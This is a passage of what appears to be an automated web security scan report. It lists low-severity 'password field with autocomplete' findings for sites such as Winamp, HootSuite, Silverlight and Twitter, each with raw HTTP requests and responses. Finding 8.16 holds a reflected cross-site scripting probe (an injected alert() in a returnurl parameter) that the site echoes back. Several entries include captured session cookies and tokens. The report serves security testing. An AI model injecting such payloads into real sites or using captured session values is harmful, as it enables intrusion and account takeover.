Cookie: bbsessionhash=ea76dc35499742119b5f293ea9989f5b; bblastvisit=1298828548; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; bblastactivity=0; s_pers=%20s_getnr%3D1298828732009-New%7C1361900732009%3B%20s_nrgvo%3DNew%7C1361900732010%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//forums.winamp.com/forumdisplay.php%2525253Ff%2525253D8%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:45:39 GMT
Server: Apache
Set-Cookie: bblastactivity=0; expires=Mon, 27-Feb-2012 17:45:39 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Set-Cookie: bbforum_view=69e4fbc86349a7a5cfb9f670fdc9bde629839986a-1-%7Bi-8_i-1298828739_%7D; path=/
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 124744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=386">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.12. http://forums.winamp.com/login.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://forums.winamp.com
Path:   /login.php

Request

POST /login.php?do=login HTTP/1.1
Host: forums.winamp.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/
Cache-Control: max-age=0
Origin: http://forums.winamp.com
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbsessionhash=ea76dc35499742119b5f293ea9989f5b; bblastvisit=1298828548; bblastactivity=0; s_pers=%20s_getnr%3D1298828556997-New%7C1361900556997%3B%20s_nrgvo%3DNew%7C1361900556999%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b
Content-Length: 235

vb_login_username=User+Name&cookieuser=1&vb_login_password=&s=ea76dc35499742119b5f293ea9989f5b&securitytoken=guest&do=login&vb_login_md5password=d41d8cd98f00b204e9800998ecf8427e&vb_login_md5password_u
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:42:51 GMT
Server: Apache
Set-Cookie: bblastactivity=0; expires=Mon, 27-Feb-2012 17:42:51 GMT; path=/
Cache-Control: private
Pragma: private
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=386">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

8.13. http://hootsuite.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://hootsuite.com
Path:   /

Request

GET / HTTP/1.1
Host: hootsuite.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=26142884.1298042216.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=26142884.1699279847.1298042216.1298042216.1298044541.2

Response

HTTP/1.1 200 OK
Server: HootSuite Server v1.1
Date: Tue, 01 Mar 2011 13:15:58 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: _SID=3064e27fe024aa99d841665c17adcfd394baba92; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Gridnum: 35
Vary: Accept-Encoding
Content-Length: 22631

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="static" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="
...[SNIP]...
<div id="secureId" class="rb-a-4">
<form name="memberLoginForm" id="homePageMemberLoginForm" method="post" onKeyPress="checkForEnterKey(event, '_submitLogin');" action="https://hootsuite.com/login">
   <h3>
...[SNIP]...
</label>
<input id="loginPassword" name="loginInfo[password]" type="password" tabindex="3"/>
<p class="forgotPassword">
...[SNIP]...

8.14. http://lilypad.cranberry.com/person/new  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://lilypad.cranberry.com
Path:   /person/new

Request

GET /person/new HTTP/1.1
Host: lilypad.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/category/All
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 401 Unauthorized
Date: Sun, 27 Feb 2011 16:49:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: lilypad=b8bdcac7a89c7fd461362047b93416c5; expires=Tue, 29 Mar 2011 16:49:18 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...
<div class="content" style="min-height: 280px;">
<form class="uniForm" action="" method="post" style="padding: 20px;">
<fieldset class="inlineLabels">
...[SNIP]...
<div class="multiField">
<input type="password" name="signup[password]" id="signup_password" /> <input type="password" name="signup[confirm_password]" id="signup_confirm_password" /> </div>
...[SNIP]...

8.15. http://lilypad.cranberry.com/person/new  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://lilypad.cranberry.com
Path:   /person/new

Request

GET /person/new HTTP/1.1
Host: lilypad.cranberry.com
Proxy-Connection: keep-alive
Referer: http://peoplepond.com/category/All
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 401 Unauthorized
Date: Sun, 27 Feb 2011 16:49:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_perl/2.0.4 Perl/v5.10.0
X-Powered-By: PHP/5.2.6-1+lenny9
Set-Cookie: lilypad=b8bdcac7a89c7fd461362047b93416c5; expires=Tue, 29 Mar 2011 16:49:18 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 9770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="cs" lang="cs">
<head>
<meta htt
...[SNIP]...
<div class="content" style="min-height: 280px;">
<form class="uniForm" action="" method="post" style="padding: 20px;">
<fieldset class="inlineLabels">
...[SNIP]...
</label> <input type="password" name="signin[password]" id="signin_password" /> <p class="formHint">
...[SNIP]...

8.16. https://login.silverlight.net/login/signin.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://login.silverlight.net
Path:   /login/signin.aspx

Request

POST /login/signin.aspx?returnurl='%22+ns%3dalert(0x0000C7)+ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://login.silverlight.net/login/signin.aspx?returnurl='%22%20ns=alert(0x0000C7)%20
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: login.silverlight.net
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: omniID=1296343609010_276c_8196_7f44_eaa48f639648; s_cc=true; s_sq=msstoslvnet%3D%2526pid%253Dlogin.silverlight.net/login/signin.aspx%2526pidt%253D1%2526oid%253Dfunctiononclick%252528%252529%25257BWebForm_DoPostBackWithOptions%252528newWebForm_PostBackOptions%252528%252522ctl00%252524mainMiddle%252524loginFo%2526oidt%253D2%2526ot%253DSUBMIT%2526oi%253D111; ASP.NET_SessionId=1v2hdzef02l3bh4551flgsaj
Content-Length: 233

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTEyNjc1MTYyMTZkZO%2FafV0CJRP%2B2ILM8De2o6zEhcVm&__EVENTVALIDATION=%2FwEWAgLNm4PjCwL0iqHzAh9XOTMNktAsCvWQ8c3pqepo2pjW&ctl00%24mainMid
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Tue, 01 Mar 2011 03:41:31 GMT
Content-Length: 14982


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   The Of
...[SNIP]...
</p>
<form name="aspnetForm" method="post" action="signin.aspx?returnurl='%22+ns%3dalert(0x0000C7)+" onsubmit="javascript:return WebForm_OnSubmit();" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_mainMiddle_loginForm_btnLogin')" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$mainMiddle$loginForm$txtPassword" type="password" id="ctl00_mainMiddle_loginForm_txtPassword" tabindex="2" style="width:200px;" /></span>
...[SNIP]...

8.17. http://mail.ioerror.us/mailman/listinfo/bad-behavior  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mail.ioerror.us
Path:   /mailman/listinfo/bad-behavior

Request

GET /mailman/listinfo/bad-behavior HTTP/1.1
Host: mail.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:11:00 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=us-ascii
Content-Length: 5962

<!-- $Revision: 5865 $ -->
<HTML>
<HEAD>
<TITLE>bad-behavior Info Page</TITLE>

</HEAD>
<BODY BGCOLOR="#ffffff">

<P>
<TABLE COLS="1" BORDER="0" CELLSPACING="4" CELLPADDING="5">

...[SNIP]...
</FORM>
<FORM Method=POST ACTION="http://mail.ioerror.us/mailman/subscribe/bad-behavior">
</TD>
...[SNIP]...
<TD><INPUT type="Password" name="pw" size="15"></TD>
...[SNIP]...
<TD><INPUT type="Password" name="pw-conf" size="15"></TD>
...[SNIP]...

8.18. http://mail.ioerror.us/mailman/listinfo/bad-behavior  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mail.ioerror.us
Path:   /mailman/listinfo/bad-behavior

Request

GET /mailman/listinfo/bad-behavior HTTP/1.1
Host: mail.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:11:00 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=us-ascii
Content-Length: 5962

<!-- $Revision: 5865 $ -->
<HTML>
<HEAD>
<TITLE>bad-behavior Info Page</TITLE>

</HEAD>
<BODY BGCOLOR="#ffffff">

<P>
<TABLE COLS="1" BORDER="0" CELLSPACING="4" CELLPADDING="5">

...[SNIP]...
<TD COLSPAN="2" WIDTH="100%">
   <FORM Method=POST ACTION="http://mail.ioerror.us/mailman/roster/bad-behavior">
   <INPUT name="language" type="HIDDEN" value="en" >
...[SNIP]...
<INPUT type="Text" name="roster-email" size="20" value="">Password: <INPUT type="Password" name="roster-pw" size="15">&nbsp;&nbsp;<INPUT name="SubscriberRoster" type="SUBMIT" value="Visit Subscriber List" >
...[SNIP]...

8.19. http://mail.ioerror.us/mailman/listinfo/bad-behavior-announce  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mail.ioerror.us
Path:   /mailman/listinfo/bad-behavior-announce

Request

GET /mailman/listinfo/bad-behavior-announce HTTP/1.1
Host: mail.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:11:00 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=us-ascii
Content-Length: 6197

<!-- $Revision: 5865 $ -->
<HTML>
<HEAD>
<TITLE>bad-behavior-announce Info Page</TITLE>

</HEAD>
<BODY BGCOLOR="#ffffff">

<P>
<TABLE COLS="1" BORDER="0" CELLSPACING="4" CELLPADD
...[SNIP]...
<TD COLSPAN="2" WIDTH="100%">
   <FORM Method=POST ACTION="http://mail.ioerror.us/mailman/roster/bad-behavior-announce">
   <INPUT name="language" type="HIDDEN" value="en" >
...[SNIP]...
<INPUT type="Text" name="roster-email" size="20" value="">Password: <INPUT type="Password" name="roster-pw" size="15">&nbsp;&nbsp;<INPUT name="SubscriberRoster" type="SUBMIT" value="Visit Subscriber List" >
...[SNIP]...

8.20. http://mail.ioerror.us/mailman/listinfo/bad-behavior-announce  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mail.ioerror.us
Path:   /mailman/listinfo/bad-behavior-announce

Request

GET /mailman/listinfo/bad-behavior-announce HTTP/1.1
Host: mail.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:11:00 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=us-ascii
Content-Length: 6197

<!-- $Revision: 5865 $ -->
<HTML>
<HEAD>
<TITLE>bad-behavior-announce Info Page</TITLE>

</HEAD>
<BODY BGCOLOR="#ffffff">

<P>
<TABLE COLS="1" BORDER="0" CELLSPACING="4" CELLPADD
...[SNIP]...
</FORM>
<FORM Method=POST ACTION="http://mail.ioerror.us/mailman/subscribe/bad-behavior-announce">
</TD>
...[SNIP]...
<TD><INPUT type="Password" name="pw" size="15"></TD>
...[SNIP]...
<TD><INPUT type="Password" name="pw-conf" size="15"></TD>
...[SNIP]...

8.21. https://shop.winamp.com/store  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://shop.winamp.com
Path:   /store

Request

GET /store?Action=DisplayPage&Locale=en_US&SiteID=winamp&id=QuickBuyCartPage HTTP/1.1
Host: shop.winamp.com
Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828673274-New%7C1361900673274%3B%20s_nrgvo%3DNew%7C1361900673275%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/buy%252526ot%25253DA%3B; ORA_WX_SESSION="10.1.2.74:516-0#0"; JSESSIONID=9ECEAF651620130932EEFCAA185CC2EF; VISITOR_ID=971D4E8DFAED436717607F8CF5E2471D3549693AC5B8492B; BIGipServerp-drh-dc1pod5-pool1-active=1241645322.516.0000

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=135999654774,0)
Date: Sun, 27 Feb 2011 17:44:35 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb02@dc1app59
Content-Length: 101124


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
</a>


<form name="CheckoutPaymentForm" method="post" action="/DRHM/store">
   <input type="hidden" name="Action" value="PostCheckoutPaymentPage"/>
...[SNIP]...
<input type="hidden" name="ORIG_VALUE_PASSWORDpassword" value=""/><input type="password" name="PASSWORDpassword" value="" id="pass1"/>
                           </div>
...[SNIP]...
<input type="hidden" name="ORIG_VALUE_PASSWORDconfirmPassword" value=""/><input type="password" name="PASSWORDconfirmPassword" value="" id="pass2"/>
                           </div>
...[SNIP]...

8.22. http://telligent.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /login.aspx

Request

GET /login.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a27+GMT; expires=Sun, 26-Feb-2012 23:21:27 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:26 GMT
Connection: close
Content-Length: 41223


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<body spellcheck="true">
       <form name="aspnetForm" method="post" action="/login.aspx" id="aspnetForm">
<div>
...[SNIP]...
<span class="field-item-input"><input name="ctl00$content$ctl00$fragment_7499$ctl01$ctl00$ctl02$ctl15$password" type="password" maxlength="64" size="30" id="ctl00_content_ctl00_fragment_7499_ctl01_ctl00_ctl02_ctl15_password" onkeydown="return KeyDownHandlerctl00_content_ctl00_fragment_7499_ctl01_ctl00_ctl02_ctl15_loginButton(event);" /></span>
...[SNIP]...

8.23. http://telligent.com/login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /login.aspx

Request

GET /login.aspx?ReturnUrl=%2fproducts%2ftelligent_community%2f HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a21%3a27+GMT; expires=Sun, 26-Feb-2012 23:21:27 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:21:26 GMT
Connection: close
Content-Length: 41499


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<body spellcheck="true">
       <form name="aspnetForm" method="post" action="/login.aspx?ReturnUrl=%2fproducts%2ftelligent_community%2f" id="aspnetForm">
<div>
...[SNIP]...
<span class="field-item-input"><input name="ctl00$content$ctl00$fragment_7499$ctl01$ctl00$ctl02$ctl15$password" type="password" maxlength="64" size="30" id="ctl00_content_ctl00_fragment_7499_ctl01_ctl00_ctl02_ctl15_password" onkeydown="return KeyDownHandlerctl00_content_ctl00_fragment_7499_ctl01_ctl00_ctl02_ctl15_loginButton(event);" /></span>
...[SNIP]...

8.24. http://trafficshaping.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://trafficshaping.com
Path:   /

Request

GET / HTTP/1.1
Host: trafficshaping.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:32:11 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
Set-Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; expires=Sun, 27-Feb-2011 18:32:11 GMT; path=/; domain=.trafficshaping.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: csId=deleted; expires=Sat, 27-Feb-2010 16:32:10 GMT
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8066

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>TrafficShaping - The URL Shortener for Online Marketers</title>
<meta name="des
...[SNIP]...
<div align="center">&nbsp;
               <form name="signin" method="post" class="listform-home" action="https://client.trafficshaping.com/signin">
           <ol>
...[SNIP]...
<li>
                   <input type="password" size="25" name="password" />
               </li>
...[SNIP]...

8.25. https://twitter.com/oauth/authenticate  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://twitter.com
Path:   /oauth/authenticate

Request

GET /oauth/authenticate?oauth_token=RY9pXmKSYCHn4ZOq4lHvegoli01DxbPGl4swXkb0iQ HTTP/1.1
Host: twitter.com
Connection: keep-alive
Referer: http://klout.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=129797651447110140; k=173.193.214.243.1298770536066098; __utmz=43838368.1298770586.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=cloudscan.us; __utma=43838368.1964851609.1298770586.1298770586.1298770586.1; __utmv=43838368.lang%3A%20en

Response

HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 02:57:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1298948244-99085-34217
ETag: "61acb31485bfecfac0f4f92f3b8e6eb2"-gzip
Last-Modified: Tue, 01 Mar 2011 02:57:24 GMT
X-Runtime: 0.01301
Content-Type: text/html; charset=utf-8
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: original_referer=il7XRY41jHkSWESiWNTCujy9Toi1xC1W; path=/
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWQ2NzQ3NGE5Y2YxM2ViMGVjYTJhYjhiZTRmMmQy%250AYWQ6DnJldHVybl90byJiaHR0cHM6Ly90d2l0dGVyLmNvbS9vYXV0aC9hdXRo%250AZW50aWNhdGU%252Fb2F1dGhfdG9rZW49Ulk5cFhtS1NZQ0huNFpPcTRsSHZlZ29s%250AaTAxRHhiUEdsNHN3WGtiMGlROg9jcmVhdGVkX2F0bCsII0VZby4BOgdpZCIl%250ANWYzNWNhOGI1OTJhM2JhZmU5YWQ5YjA2MTU5ODgwOGEiCmZsYXNoSUM6J0Fj%250AdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--e711b42fd4829d2613b878aeeaf6908dcd08e937; domain=.twitter.com; path=/; HttpOnly
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close
Content-Length: 6995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<meta c
...[SNIP]...
<div id="content" class="clearfix">
<form action="https://twitter.com/oauth/authenticate" id="login_form" method="post"><div style="margin:0;padding:0">
...[SNIP]...
